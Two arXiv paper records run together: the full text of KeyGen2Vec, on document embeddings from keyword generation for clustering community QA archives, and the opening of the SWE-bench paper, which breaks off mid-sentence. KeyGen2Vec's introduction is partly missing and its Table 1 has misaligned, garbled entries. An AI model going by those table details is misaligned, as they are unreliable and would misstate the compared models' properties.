KeyGen2Vec is shown to be competitive with classifier that exploits topic label supervision in Yahoo! cQA with larger number of latent topic labels.
Iftitahu Ni'mah, Samaneh Khoshrou, Vlado Menkovski, Mykola Pechenizkiy
2023-10-30T15:35:45Z
http://arxiv.org/abs/2310.19650v1
# KeyGen2Vec: Learning Document Embedding via Multi-label Keyword Generation in Question-Answering ###### Abstract Representing documents into high dimensional embedding space while preserving the structural similarity between document sources has been an ultimate goal for many works on text representation learning. Current embedding models, however, mainly rely on the availability of label supervision to increase the expressiveness of the resulting embeddings. In contrast, unsupervised embeddings are cheap, but they often cannot capture implicit structure in target corpus, particularly for samples that come from different distribution with the pre-training source. Our study aims to loosen up the dependency on label supervision by learning document embeddings via Sequence-to-Sequence (Seq2Seq) text generator. Specifically, we reformulate keyphrase generation task into multi-label keyword generation in community-based Question Answering (cQA). Our empirical results show that **KeyGen2Vec** in general is superior than multi-label keyword classifier by up to 14.7% based on Purity, Normalized Mutual Information (NMI), and F1-Score metrics. Interestingly, although in general the absolute advantage of learning embeddings through label supervision is highly positive across evaluation datasets, **KeyGen2Vec** is shown to be competitive with classifier that exploits topic label supervision in YahoocQA with larger number of latent topic labels. 1 Footnote 1: The empirical study was completed in 2020 at Eindhoven University of Technology. semantic knowledge for document clustering can be divided into two: (1) approaches that focus on improving the quality of document embeddings during training [21, 14]; and (2) approaches that focus on improving the clustering algorithm or subsequent tasks by providing additional post-pipelines [1, 13, 12] to intensify the expressiveness of representations in latent space, such that semantically similar points in that space are close together compared to dissimilar points. However, these works depend on multiple pipelines, which consequently hinder their reproducibility and adaptation as end-to-end system in many real world NLP applications. Our work mainly focuses on topical clustering of cQA archives as a subsequent task to evaluate currently available document embedding approaches, including the proposed **KeyGen2Vec** framework. As a motivating example, Figure 0(a)-0(b) illustrate how unsupervised-based embeddings are likely random, indicating the model's incapability to capture semantic aspects such as latent topics structure inferred in target data. By contrast, supervised approach is more expressive, producing separable clusters in latent space that are coherent with topics, as shown in Figure 0(c)-0(d). However, the latter model requires learning document embeddings with topics as label supervision. So, it is more costly than the unsupervised embedding approaches. To negotiate the trade-offs between utilizing unsupervised and supervised approaches for learning document embeddings, we utilize keywords as sub-latent structure in corpora to train Seq2Seq networks referred to as **KeyGen2Vec**. Our work holds an assumption that learning a conditioned sequence-to-sequence mapping between documents and their corresponding keywords equals to learning the structural similarity that hierarchically links contents in document, keywords as explicit document abstractions, and topics as latent variables that further group documents based on keywords co-occurrences. 
For a fair comparison, we also train Multi-label and Multi-class Neural Network classifiers as supervised approaches to learn document embeddings on cQA data. The main difference between our proposal and classifier-based approaches is that the classifiers view keywords and topics as discrete labels \(Y\in R^{d}\), while the proposed **KeyGen2Vec** sees keywords as a sequence of discrete structure \(Y\in\Sigma^{*}\). Summarizing, **our main contributions** are: * We introduce **KeyGen2Vec**, a simple Seq2Seq framework that can be utilized as a general tool to learn document embeddings conditioned on sub-topics information, such as keywords. * We comprehensively investigate currently available approaches for learning document embeddings We empirically show that unsupervised approaches often produce clusters that are incoherent with hidden semantics or latent structure inferred in target data. * We empirically show that training Seq2Seq networks on multi-label keyword generation is analogous to indirectly incorporating label dependency assumption. We demonstrate that the proposed **KeyGen2Vec** is superior than a classifier that is trained on multi-label classification task with document source as inputs and keywords as target outputs for the models. ## 2 Background ### Community-based Question Answering Our study focuses on investigating the potential usefulness of state-of-the-art document embeddings Figure 2: **KeyGen2Vec. Model is trained in _autoregressive_ mode. In teacher forcing mode, \(t-1\) shifted version of keyword is given to the model as input for decoder. Circles represent RNN states in encoder (left/source) and decoder (right/target) network.** for clustering cQA archives with topics as latent structural similarity. Most of previous studies on cQA archives are centralized on the exploration of **retrieval** issues, such as learning latent topics for question retrieval Cai et al. (2011), a retrieval framework with neural network embedding P et al. (2017), hybrid approach of neural network and latent topic clustering to rank the candidate answers given question Yoon et al. (2018); and **textual similarity** problems between questions and their candidate answers Wang et al. (2010); Tan et al. (2016); Yang et al. (2018). Whereas, previous works on **clustering** cQA archives mainly focus on improving clustering algorithm based on simple feature extractor method (e.g. TfIdf) Momatzi and Klakow (2009); P (2016). **Topical clustering** itself is previously studied by Rosa et al. (2011) to organize large unstructured twitter posts into topically coherent clusters with hashtags as a means of guidance. ### Document Embedding Our study on currently available document embeddings is constrained on approaches that are domain independent. Since most space is devoted to the proposed framework and model evaluation, we refer the future readers to the original papers. Figure 3 shows document embedding approaches that are being observed in this study, which we broadly divided based on three categories: (1) Non-distributed (frequency-based) approach; (2) Probabilistic approach; and (3) Distributed (neural-based) embedding learning. The property of each embedding model is briefly described in Table 1. For a fair comparison, we include methods that learn embeddings based on global semantic structure (**GLO**), sub-semantic structure (**SUB**), sequential assumption (**SEQ**), pretrained embeddings (**PRE**), and directly trained embeddings on the target corpus (**TRA**). 
\begin{table} \begin{tabular}{l|l|c c c c c} \hline \hline No & Model & GLO & SUB & SEQ & PRE & TRA & DIM \\ \hline 1 & **KeyGen2Vec** & - & ✓ & ✓ & - & ✓ & 200 \\ 2 & S2S-AE & - & - & ✓ & - & ✓ & 200 \\ 3 & **FC-Mult-Cls\({}^{\ast}\)** & ✓ & - & - & - & ✓ & 100 \\ \hline 4 & Sign-Mult-Lbl & - & ✓ & - & - & ✓ & 100 \\ 5 & Soft-Mult-Lbl & - & ✓ & - & - & ✓ & 100 \\ 6 & S-BERT & - & - & - & ✓ & - & 768 \\ 7 & LDA-Topic & - & - & - & - & ✓ & * \\ 8 & D2V-DBOW & 100 & - & - & - & ✓ & 100 \\ 9 & D2V-PVDM100 & - & - & - & ✓ & 100 \\ 10 & Avg-GloVe100 & - & - & - & ✓ & - & 100 \\ 11 & Avg-v2v100 & - & - & - & ✓ & - & 100 \\ 12 & Avg-GloVe300 & - & - & - & ✓ & - & 300 \\ 13 & Avg-v2v300 & - & - & - & ✓ & - & 300 \\ 14 & Avg-v2v50-tr-sm & - & - & - & ✓ & 50 \\ 15 & Avg-v2v50-tr-lg & - & - & - & ✓ & 50 \\ 16 & Avg-PMI50 & - & - & - & ✓ & 50 \\ 17 & DC-GloVe100 & - & - & - & ✓ & - & \(100^{2}/2\) \\ 18 & DC-w2v100 & - & - & - & ✓ & - & \(100^{2}/2\) \\ 19 & DC-PMI50 & - & - & - & - & ✓ & \(50^{2}/2\) \\ 20 & DC-w2v50-tr-lg & - & - & - & ✓ & \(50^{2}/2\) \\ 21 & TfIdf & - & - & - & - & ✓ & **?** \\ \hline \hline \end{tabular} \end{table} Table 1: Properties of models compared in this study: **GLO**: Global semantics (topic labels) are exposed to the model; **SUB**: Sub-semantic structures (keywords) are exposed to the model; **SEQ**: Model with sequential assumption; **PRE**: Use pretrained embedding - no finetuning; **TRA**: training on observed corpus; **DIM**: Dimension of embeddings; \({}^{\ast}\) depends on the chosen hyper-parameter (\(N\) topics) ; \({}^{\ast}\)\({}^{\ ## 3 KeyGen2Vec Framework **KeyGen2Vec** is built based on a hierarchical semantic assumption of a corpus, as briefly illustrated in Figure 4. The assumption is that documents and their corresponding keyword labels form sub-structures or _sub-networks_ of latent topic structure as global semantics. Our work adopts Seq2Seq-based keyphrase generation introduced by Meng et al. (2017); Chen et al. (2018). While these preliminary works are motivated by the intuition of Seq2Seq capturing document semantics, there is currently neither analysis nor empirical evidence to support the claim that the learnt context representation has encapsulated latent semantic concept of document source conditioned on its keyword labels. We hypothesize that Seq2Seq network that has been trained on a keyword generation task is capable of capturing such latent semantic structure inferred in data. Figure 5 illustrates the reformulation of multi-label keyword generation as the training objective of **KeyGen2Vec**. The objective of the task is to approximate the mapping function \(f:X\mapsto Y\) - where \(X\) denotes a collection of documents and \(Y\) denotes the corresponding set of keywords in observation set. These sets of observations \(\{(x_{i},\{y_{i}^{1},y_{i}^{2}\})\}\) were transformed into one-to-one training examples \(\{x_{i},y_{i}^{1}\},\{x_{i},y_{i}^{k}\}\) (fig. 4(b)). Each training example is represented as sequences, \(\mathcal{X}:\Sigma^{*}\) and \(\mathcal{Y}:\Sigma^{*}\). In inference stage, to evaluate how well the trained Seq2Seq capture the semantic structure inferred in \(f\), the parameterized encoder decoder model \(g\) was further utilized as a decoder framework, to generate keywords given unseen documents. Details of architecture used is further explained in sec.3.1. ### Architecture Our framework is built based on a standard Sequence-to-Sequence (Seq2Seq) encoder-decoder framework. 
An encoder first maps a sequence of words to a vector \(c\) - where \(c\) serves as the resulting document embedding. Given the encoded embedding of document source \(c\), the decoder then generates target sequences. \[\texttt{ENC}\!:\!x =\{w_{1},\dots,w_{T_{x}}\}\mapsto c\in\mathbb{R}^{d}\] \[\texttt{DEC}\!:\!c \in\mathbb{R}^{d}\mapsto y=\{w_{1},\dots,w_{T_{y}}\}\] Encoder. The encoder network is constructed of bidirectional GRU units for mapping a sequence of embedded words \(e_{t\dots T_{x}}\) into a sequence of intermediate state representations \(h_{t\dots T_{x}}\), which is a concatenation of forward and backward hidden states \(h_{t\dots T_{x}}=[\overrightarrow{h},\overleftarrow{h}]\). \[\overrightarrow{h_{t\dots T_{x}}} =\overrightarrow{GRU}(e_{t\dots T_{x}})\] \[\overleftarrow{h_{t\dots T_{x}}} =\overleftarrow{GRU}(e_{t\dots T_{x}})\] Decoder. The decoder is a neural language model based on a forward GRU network that conditions on the context embedding of the encoder \(c\). \(s_{t-1}\) is the decoder state at the previous time step. \(y_{t-1}\) denotes the prediction at \(t-1\). Here, \(g(.)\) denotes the prediction layer (dense network) with a softmax activation function. \[s_{t}=\overrightarrow{\text{GRU}}(y_{t-1},s_{t-1},c)\] \[p(y_{t}|y_{1,\dots,t-1},x)=g(y_{t-1},s_{t},c)\] Attention. We use Bahdanau's MLP attention scoring function (Bahdanau et al., 2014) to calculate the attention score \(\alpha\), which corresponds to the importance weight of words in the source sequence given the embedding of words in the target sequence. \[\alpha_{t}=\frac{exp(score(s_{t}^{(j)},h_{t\dots T_{x}}^{(i)}))}{\sum_{t}^{T_{x}}exp(score(s_{t}^{(j)},h_{t\dots T_{x}}^{(i)}))}\] Figure 4: Corpus as hierarchical semantic network of documents, keywords, and topics. Figure 5: Training and Inference stages of the proposed KeyGen2Vec; (a) Observation set; (b) Training; (c) Prediction in test set; \(c\) is latent topic. Context (Document) Embeddings. The final document embedding \(c\) is computed as a weighted sum between the sequence of encoder states and the attention scores. \[c_{t}=\sum_{t=1}^{T_{x}}\alpha_{t}h_{t}\] ### On Label Dependency Assumption In our proposed **KeyGen2Vec** framework, keywords as target variables are represented as sequences of words. The probability of a particular keyword chosen in the inference stage equals the joint probability of the words in the sequence, \(p(w_{1:T})\). A softmax activation function is used for projecting decoder states \(s_{t-1}\in R^{d}\) into probabilistic values over the vocabulary of size \(\mathcal{V}\), \(\in R^{\mathcal{V}}\). \[p(w_{t}|w_{1},\ldots,w_{t-1};\theta)=\texttt{softmax}(Ws_{t-1}+b)\] \[p(w_{1:T})=\prod_{t}p(w_{t}|w_{1},\ldots,w_{t-1})\] where the softmax function is formally given by: \[\texttt{softmax}(z)_{i}=\frac{e^{z_{i}}}{\sum_{j=1}^{K}e^{z_{j}}}\] By dividing each softmax unit (the probability of each word \(w_{t}\) in vocabulary \(\mathcal{V}\)) by the sum of all units, the total probability of words in \(\mathcal{V}\) is ensured to be \(1\). An increase of one class probability \(p(y_{t}|x,\theta)\) causes the probabilities of the other classes to decrease. We hypothesize that by transforming the one-to-many training objective in the multi-label keyword generation task into a one-to-one multi-class learning scheme, as shown in Figure 5, we indirectly incorporate a label dependency assumption during the training stage. The trained model treats each sample as a mutually exclusive event via softmax normalization and outputs the final prediction \(\hat{y_{t}}=\operatorname*{argmax}p(y_{t}|x,\theta)\).
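To make the normalization argument concrete before continuing, here is a toy numerical illustration (all values are arbitrary, not taken from the paper): the softmax couples every vocabulary entry, so raising the score of one word necessarily lowers the probability of every other word, and the probability of a generated keyword is the product of the step-wise softmax probabilities.

```python
import numpy as np

def softmax(z):
    z = z - z.max()                    # numerical stability
    e = np.exp(z)
    return e / e.sum()

# Toy logits W s_{t-1} + b over a 4-word vocabulary
logits = np.array([2.0, 1.0, 0.5, -1.0])
print(softmax(logits), softmax(logits).sum())   # probabilities sum to 1

boosted = logits.copy()
boosted[0] += 1.0                      # increase one class score ...
print(softmax(boosted))                # ... and every other probability shrinks

def sequence_probability(stepwise_logits, token_ids):
    """p(w_{1:T}) = prod_t p(w_t | w_{<t}), one softmax per decoding step."""
    return float(np.prod([softmax(l)[t] for l, t in zip(stepwise_logits, token_ids)]))
```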
This results in an indirect dependent assumption between a pair of keyword labels since the probability of particular pair of keywords given the same document source \(p(y_{1}^{1}|x_{1})\) and \(p(y_{1}^{2}|x_{1})\) are dependent each other. By contrast, standard multi-label learning commonly uses independent Bernoulli assumption via Sigmoid function, disregarding the dependency between labels. We further investigate this problem by comparing models with Softmax-based multi-class classification loss and a standard Sigmoid-based Multi-label classifier. ## 4 Experiments ### Data We use the following data constructed from cQA archives as gold standard for learning and evaluation. The three data sets represent data with different level of difficulties w.r.t. sentence length, noise-level, and number of unique keywords and topic labels. Toy data is considered to be less noisy and balance - each sub-class category is composed of sentences and their paraphrases, forming natural cluster structure. Yahoo! data sets with 5 topic categories (5-T) and 11 topics (11-T) are considered to be more noisy and imbalanced due to many non-informative words (e.g. digits, measures, url-links, query about address or web sources) and domain specific terms (e.g. medical and automotive terms). Toy DataWe created a small set of hand-labelled sentence-keywords-topic pairs (1448 sentences) from WikiAnswer 3. WikiAnswer is a data set composed of millions of questions asked by humans, where each sentence example is accompanied by its paraphrased versions, forming a paraphrase cluster of one particular question. We use the original WikiAnswer corpus to train large scale Word2Vec and PMI models incrementally, to inspect how the scale of data affects model performance. Table. 9 shows a training example in Toy data. The number of keywords and topic assignment per sentence were made fixed, i.e. two keywords and one topic for each sentence. Footnote 3: [http://knowitall.cs.washington.edu/oqa/data/wikianswers/](http://knowitall.cs.washington.edu/oqa/data/wikianswers/) \begin{table} \begin{tabular}{l|c|c|c|c|c} \hline Data set & \#Topics & \#Keywords & \#Train & \#Test & Sentence Length \\ \cline{3-6} & (GLO) & (SUB) & & & Length \\ \hline WikiAnswer & NA & NA & 700M & NA & \(9\pm 3\) \\ Toy data & 12 & 77 & 1158 & 290 & \(9\pm 3\) \\ 5-T Yahoo! cQA & 5 & 120 & 23824 & 5957 & \(36\pm 28\) \\ 11-T Yahoo! cQA & 11 & 179 & 70962 & 17741 & \(35\pm 28\) \\ \hline \end{tabular} \end{table} Table 2: Data set; WikiAnswer (original corpus of Toy data) is used to train Word2Vec (w2v50-tr-lg) and PMI method. \begin{table} \begin{tabular}{|l|} \hline **Source**: “the sporozoan plasmodium carried from host to host by mosquitoes causes what serious infection? \\ \hline **Keywords:** malaria; plasmodium parasite \\ **Topic:** virus and diseases \\ \hline \end{tabular} \end{table} Table 3: Sentence examples in Toy Data set Yahoo! Answer Comprehensive cQAWe reproduce and extend our result on real world cQA archives consisting of question-answers pairs, accompanied by keywords (tags) and the corresponding topic. Data was obtained from Yahoo! Answer Comprehensive cQA dataset 4, originated from the query log of Yahoo! Answer. We constructed two corpora: corpus with 5 topic categorization - referred to as 5-T cQA and corpus with 11 topics - referred to as 11-T cQA. The training and test examples were constructed by concatenating each question and the corresponding answers. Table 4 shows a training example obtained from Yahoo! Answer cQA archives. 
Likewise, each document corresponds to a fixed membership: two keywords and one topic describing the document's semantic abstraction.

Footnote 4: [https://webscope.sandbox.yahoo.com/catalog.php](https://webscope.sandbox.yahoo.com/catalog.php)

### Training and Hyper-parameters

For training **KeyGen2Vec**, we use a negative log-likelihood loss function with the adaptive learning rate optimizer Adam [1], \(lr=0.001,betas=(0.9,0.98),eps=1e-9\). Curriculum learning [1] was employed to sample whether to use teacher forcing during the training stage. For the other models, we refer the reader to the provided code documentation. For LDA, trainable Word2Vec, and Paragraph Vector, we used the Gensim implementations 5. The BERT pre-trained sentence encoder is taken from a recent sentence similarity task [14]. Specifically for the Toy data experiment, we trained two Word2Vec models: the small-scale model Avg-w2v50-tr-sm was trained on the constructed Toy data, and the large-scale model Avg-w2v50-tr-lg was trained incrementally on WikiAnswer (the original large-scale corpus of the Toy data) - to inspect how model performance differs with the scale of data. Classifiers (multi-class and multi-label) were constructed from fully-connected networks (MLPs), since we did not find significant performance differences between different types of networks (i.e. dense, convolutional, and recurrent). We trained two types of multi-label classifiers (Sigm-Cls and Softm-Cls) to inspect the effect of incorporating label dependency in multi-label learning.

Footnote 5: [https://radimrehurek.com/gensim/](https://radimrehurek.com/gensim/)

### Clustering as Evaluation

We use K-Means clustering 6 to evaluate the quality (clusterability) of document embeddings in this study (Table 1). The hyper-parameter choices of K-Means are kept as minimal as possible (init='random', n_clusters=K, n_init=10, max_iter=50). This is to make sure that the clustering is not overly parameterized, which can obscure the actual quality of the learnt embeddings. Given the actual global semantic classes (topic labels) \(\mathbb{C}\) in the currently observed corpora and the predicted classes \(\Omega\) from the K-Means method, we employ **Purity**, **Normalized Mutual Information (NMI)**, and **F1-score**[11] metrics to objectively measure whether the resulting clustering \(\Omega\) can recreate or approximate the exact classes \(\mathbb{C}\).

Footnote 6: scikit-learn.org/./sklearn.cluster.KMeans.html

### \(\chi^{2}\) Feature selection

We employ feature selection based on the \(\chi^{2}\) method [11] to select the \(N\) most influential words per topic category. Each training example is then represented as a Bag-of-Influential-Words with \(N\in\{20,50,100,250\}\) for the Toy data and \(N\in\{20,50,100,250,500,1000,2500\}\) for the Yahoo! cQA data. The larger the set of influential words per category, the more noise is preserved in the training data. This is to investigate: (1) the effect of noise on the clusterability of embeddings; (2) the effect of incorporating label dependency via the Softmax-based loss on the clusterability of embeddings.

\begin{table} \begin{tabular}{|p{34.1pt}|} \hline **Source:** “what is diabetes mellitus? diabetes mellitus is medical disorder characterized by varying or persistent hyperglycemia elevated blood sugar levels,...” \\ **Keywords:** diabetes; diseases and conditions \\ **Topic:** health \\ \hline \end{tabular} \end{table} Table 4: Sentence example (concatenated cQA pair) in Yahoo! Answer cQA
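As a concrete illustration of the evaluation protocol above, the sketch below combines \(\chi^{2}\) selection of the most topic-discriminative words with the deliberately minimal K-Means configuration quoted in the clustering-as-evaluation section, scoring the resulting clustering with Purity and NMI. The toy corpus, variable names, and feature counts are placeholders, not the paper's actual data or pipeline.

```python
# Chi-squared feature selection + minimal K-Means evaluation with Purity/NMI.
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.cluster import KMeans
from sklearn.metrics import normalized_mutual_info_score
from sklearn.metrics.cluster import contingency_matrix

docs = ["what causes malaria", "plasmodium infects red blood cells",
        "how to change engine oil", "my car engine overheats"]
topics = np.array([0, 0, 1, 1])                 # gold topic labels

# Keep the N most topic-discriminative words (here N=3 for the toy corpus).
X = CountVectorizer().fit_transform(docs)
X_sel = SelectKBest(chi2, k=3).fit_transform(X, topics)

def purity(y_true, y_pred):
    # Fraction of documents assigned to the majority gold class of their cluster.
    cm = contingency_matrix(y_true, y_pred)
    return cm.max(axis=0).sum() / cm.sum()

km = KMeans(init="random", n_clusters=2, n_init=10, max_iter=50, random_state=0)
pred = km.fit_predict(X_sel.toarray())
print("Purity:", purity(topics, pred), "NMI:", normalized_mutual_info_score(topics, pred))
```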
\begin{table} \begin{tabular}{|c|c|c|c|} \hline **Dining Out** & **Health** & **Travel** & **Cars** \\ \hline hamburger & medicine & trip & jeep \\ taco & heart & map & vehicle \\ sandwich & symptom & disney & auto \\ buffet & virus & vacation & manual \\ cafe & treatment & ticket & nisan \\ \hline \end{tabular} \end{table} Table 5: Example of influential words per topic category – selected based on the \(\chi^{2}\) feature selection method on 5-T Yahoo! cQA.

## 5 Results and Discussion

We summarize our empirical findings as follows.

**KeyGen2Vec outperforms multi-label classifiers.** Based on the clustering performance on the three data sets, shown in Tables 6-8, we demonstrate that although the model does not exploit the actual topic labels during the training stage, the proposed **KeyGen2Vec** is capable of preserving topical proximity in latent space, outperforming its counterparts trained as multi-label classifiers (Sigm-Mult-Lbl and Softm-Mult-Lbl).

**The quality of unsupervised embeddings depends on the scale of data.** See how the small-scale Word2Vec (Avg-w2v50-tr-sm) results in notably low performance on the Toy data (similar to the Autoencoder S2S-AE and Doc2Vec), as compared to the large-scale Word2Vec (Avg-w2v50-tr-lg). We argue that the low quality of unsupervised embeddings in the current study is due to these models mainly depending on local information in document contents - there is no strong assumption for differentiating salient features (words) w.r.t. global semantic aspects, which may hinder their direct utilization in subsequent predictive analytics tasks. Specific to the LDA topic model, we argue that its low performance in the current task is due to the lack of a strong assumption for distinguishing between local (keywords, or more specific document themes) and global (more general) latent topics.

**The effect of noise on embedding quality.** We argue that the main reason the current clustering task is challenging for all observed models, especially unsupervised ones, is the _noisy_ characteristic of cQA archives. For instance, the topics "Health" and "Dining Out" may both contain queries about diets or sources of healthy food. The topics "Cars", "Travel", and "Local Business" may all contain queries about car rental and service. We empirically show that in a clean scenario - where training examples only contain the \(N\) most influential words w.r.t. the topic category (Toy data experiment in Fig. 7a) - unsupervised methods perform sufficiently well. The performance, however, degrades in the presence of noise (larger pre-selected feature sizes). By contrast, **KeyGen2Vec** maintains its considerably high performance (Fig. 7a-7c) regardless of the presence of noise. This indicates that the exposure to keywords as sub-topical information helps the model obtain high-quality embeddings.

**Problem reformulation improves the expressiveness of embeddings.** Redefining one-to-many multi-label learning as a one-to-one multi-class learning scheme via Softmax normalization, which we argue is analogous to indirectly incorporating label dependency (Sec. 3.2), benefits both **KeyGen2Vec** and multi-label learning in the current study, resulting in more accurate embeddings (higher \(F_{1}\)-scores in Tables 6-8 and Fig. 7a-7c).

## 6 Conclusion

We extensively investigate document embedding approaches for topical clustering of cQA archives.
We show the current limitations of unsupervised embeddings in dealing with noisy articles, indicating the need to incorporate stronger assumptions either in the learning approach or in the data. Our empirical results highlight the capability of the proposed **KeyGen2Vec** to preserve topical proximity in latent space via multi-label multi-class learning.
2310.06770
SWE-bench: Can Language Models Resolve Real-World GitHub Issues?
Language models have outpaced our ability to evaluate them effectively, but for their future development it is essential to study the frontier of their capabilities. We find real-world software engineering to be a rich, sustainable, and challenging testbed for evaluating the next generation of language models. To this end, we introduce SWE-bench, an evaluation framework consisting of $2,294$ software engineering problems drawn from real GitHub issues and corresponding pull requests across $12$ popular Python repositories. Given a codebase along with a description of an issue to be resolved, a language model is tasked with editing the codebase to address the issue. Resolving issues in SWE-bench frequently requires understanding and coordinating changes across multiple functions, classes, and even files simultaneously, calling for models to interact with execution environments, process extremely long contexts and perform complex reasoning that goes far beyond traditional code generation tasks. Our evaluations show that both state-of-the-art proprietary models and our fine-tuned model SWE-Llama can resolve only the simplest issues. The best-performing model, Claude 2, is able to solve a mere $1.96$% of the issues. Advances on SWE-bench represent steps towards LMs that are more practical, intelligent, and autonomous.
Carlos E. Jimenez, John Yang, Alexander Wettig, Shunyu Yao, Kexin Pei, Ofir Press, Karthik Narasimhan
2023-10-10T16:47:29Z
http://arxiv.org/abs/2310.06770v2
# SWE-bench: Can Language Models Resolve Real-World GitHub Issues? ###### Abstract Language models have outpaced our ability to evaluate them effectively, but for their future development it is essential to study the frontier of their capabilities. We consider real-world software engineering to be a rich, sustainable, and challenging testbed for evaluating the next generation of language models. We therefore introduce SWE-bench, an evaluation framework including \(2\),\(294\) software engineering problems drawn from real GitHub issues and corresponding pull requests across \(12\) popular Python repositories. Given a codebase along with a description of an issue to be resolved, a language model is tasked with editing the codebase to address the issue. Resolving issues in SWE-bench frequently requires understanding and coordinating changes across multiple functions, classes, and even files simultaneously, calling for models to interact with execution environments, process extremely long contexts and perform complex reasoning that goes far beyond traditional code generation. Our evaluations show that both state-of-the-art proprietary models and our fine-tuned model SWE-Llama can resolve only the simplest issues. Claude 2 and GPT-4 solve a mere \(4.8\%\) and \(1.7\%\) of instances respectively, even when provided with an oracle retriever. Advances on SWE-bench represent steps towards LMs that are more practical, intelligent, and autonomous. ## 1 Introduction Language models (LMs) are rapidly being deployed in commercial products such as chatbots and coding assistants. At the same time, existing benchmarks have become saturated (Kiela et al., 2021; Ott et al., 2022) and fail to capture the frontier of what state-of-the-art LMs can and cannot do. There is a need for challenging benchmarks that more accurately reflect real-world applications of LMs to help shape their future development and usage (Srivastava et al., 2023). Building a good benchmark is difficult since tasks must be challenging enough to stump existing models, but model predictions must also be easy to verify (Martinez-Plumed et al., 2021). Coding tasks are appealing as they pose challenging problems to LMs and generated solutions can be easily verified by running unit tests. However, existing coding benchmarks, such as HumanEval (Chen et al., 2021), mostly involve self-contained problems that can be solved in a few lines of code. Figure 1: SWE-bench sources task instances from real-world Python repositories by connecting GitHub issues to merged pull request solutions that resolve related tests. Provided with the issue text and a codebase snapshot, models generate a patch that is evaluated against real tests. In the real world, software engineering is not as simple. Fixing a bug might involve navigating a large repository, understanding the interplay between functions in different files, or spotting a small error in convoluted code. Inspired by this, we introduce SWE-bench, a benchmark that evaluates LMs in a realistic software engineering setting. As shown in Figure 1, models are tasked to resolve issues (typically a bug report or a feature request) submitted to popular GitHub repositories. Each task requires generating a patch describing changes to apply to the existing codebase. The revised codebase is then evaluated using the repository's testing framework. SWE-bench offers several advantages over existing LM programming benchmarks. 
These include, a realistic setting that utilizes user-submitted issues and solutions, diverse inputs featuring unique code problems from \(12\) repositories, a robust framework for execution-based evaluation, and the ability to continuously update the benchmark with new instances, requiring minimal human intervention. We evaluate SWE-bench on multiple state-of-the-art LMs and find that they fail to solve all except the simplest issues. For instance, Claude 2 and GPT-4 only resolve \(4.8\%\) and \(1.7\%\) of tasks respectively; even using an oracle that retrieves the files to edit from a reference solution. Using a BM25 retriever, performance drops further to \(1.96\%\) for Claude 2. To aid open model development in this direction, we release a training dataset, SWE-bench-train consisting of \(19{,}000\) non-testing task instances from \(37\) other repositories. Using this dataset, we finetune two models, SWE-Llama \(7\)b and \(13\)b based on CodeLlama (Roziere et al., 2023), that are competitive with Claude 2 and can solve issues using over \(100{,}000\) tokens as context. We hope SWE-bench serves as a challenging software engineering benchmark that aids in better understanding of the abilities and limitations of LMs. ## 2 SWE-bench SWE-bench is a benchmark featuring GitHub _issues_ from popular repositories that report bugs or request new features, and _pull requests_ that make changes to the repository to resolve these issues. The task is to generate a pull request that addresses a given issue and passes tests related to the issue. ### Benchmark Construction GitHub is a rich data source for software development, but repositories, issues, and pull requests can be noisy, ad-hoc, or poorly documented or maintained. To find high-quality task instances at scale, we use a \(3\)-stage pipeline as follows. **Stage I: Repo selection and data scraping**. We start by collecting pull requests (PRs) from \(12\) popular open-source Python repositories on GitHub, producing about \(\sim 90{,}000\) PRs in total. We focus on popular repositories as they tend be better maintained, have clear contributor guidelines, and have better test coverage. Each PR has an associated codebase, which is the state of the repository before the PR was merged. **Stage II: Attribute-based filtering**. We create candidate tasks by selecting the _merged_ PRs that (1) resolve a GitHub issue and (2) make changes to the test files of the repository, which indicates that the user likely contributed tests to check whether the issue has been resolved. **Stage III: Execution-based filtering**. For each candidate task, we apply the PR's test content, and log the associated test results _before_ and _after_ the PR's other content is applied. We filter out task instances without at least one test where its status changes from a _fail_ to _pass_ (henceforth referred to as _fail-to-pass_ test). We also filter out instances that result in installation or runtime errors. Through these stages of filtering, the original \(90{,}000\) PRs are filtered down to the \(2{,}294\) task instances which comprise SWE-bench. A final breakdown of these task instances across repositories Figure 2: SWE-bench task instances are created from merged pull requests that resolve an issue, contributes tests, and install successfully. is presented in Figure 3, and Table 1 highlights the key features of SWE-bench task instances. 
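As a rough illustration of the Stage II attribute-based filter described above, the sketch below keeps only merged PRs that reference an issue and touch at least one test file. The record fields (`merged`, `body`, `changed_files`) and the keyword pattern are assumptions for illustration, not the benchmark's actual pipeline code.

```python
# Schematic Stage II filter: merged PRs that resolve an issue and modify tests.
import re

ISSUE_KEYWORDS = re.compile(r"\b(close[sd]?|fix(e[sd])?|resolve[sd]?)\s+#\d+", re.I)

def is_candidate(pr: dict) -> bool:
    """pr is an assumed dict with 'merged', 'body', and 'changed_files' keys."""
    if not pr.get("merged"):
        return False
    resolves_issue = bool(ISSUE_KEYWORDS.search(pr.get("body") or ""))
    touches_tests = any("test" in path.lower() for path in pr["changed_files"])
    return resolves_issue and touches_tests

# Example with a toy PR record:
pr = {"merged": True,
      "body": "Fixes #1234 by handling empty inputs.",
      "changed_files": ["pkg/core.py", "tests/test_core.py"]}
print(is_candidate(pr))  # True
```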
We highlight that the codebases are large with thousands of files, and the reference pull requests often make changes to multiple files at once. Technical details about SWE-bench's construction pipeline are discussed in Appendix A. More statistics are in Appendix A.5. ### Task Formulation **Model input.** A model is given an issue text description and a complete codebase. The model is then tasked to make an edit to the codebase to resolve the issue. In practice, we represent edits as patch files, which specify which lines in the codebase to modify in order to resolve the issue. **Evaluation metrics.** To evaluate a proposed solution, we apply the generated patch, using unix's patch program, to the codebase and then execute the unit and system tests associated with the task instance. If the patch applies successfully and all of these tests pass we consider the proposed solution to have successfully resolved the issue. The metric for our benchmark is the percentage of task instances that are resolved. Additional technical details in Appendix A.4. ### Features of SWE-bench Traditional benchmarks in NLP typically involve only short input and output sequences and consider somewhat "contrived" problems created specifically for the benchmark. In contrast, SWE-bench's realistic construction setting imbues the dataset with unique properties, which we discuss below. **Real-world software engineering tasks**. Since each task instance in SWE-bench consists of a large and complex codebase and a description of a relevant issue, solving SWE-bench requires demonstrating sophisticated skills and knowledge possessed by experienced software engineers but are not commonly evaluated in traditional code generation benchmarks. **Continually updatable**. Our collection process can be easily applied to any Python repository on GitHub and requires almost no human intervention. Therefore, we can extend SWE-bench with a continual supply of new task instances and evaluate LMs on issues created after their training date, which ensures that the solution was not included in their training corpus. **Diverse long inputs.** Issue descriptions are typically long and detailed (\(195\) words on average), and codebases regularly contain many thousands of files. Solving SWE-bench requires identifying the relatively small number of lines that need to be edited to solve the issue amongst a sea of context. **Robust evaluation.** For each task instance, there is at least one _fail-to-pass_ test which was used to test the reference solution, and 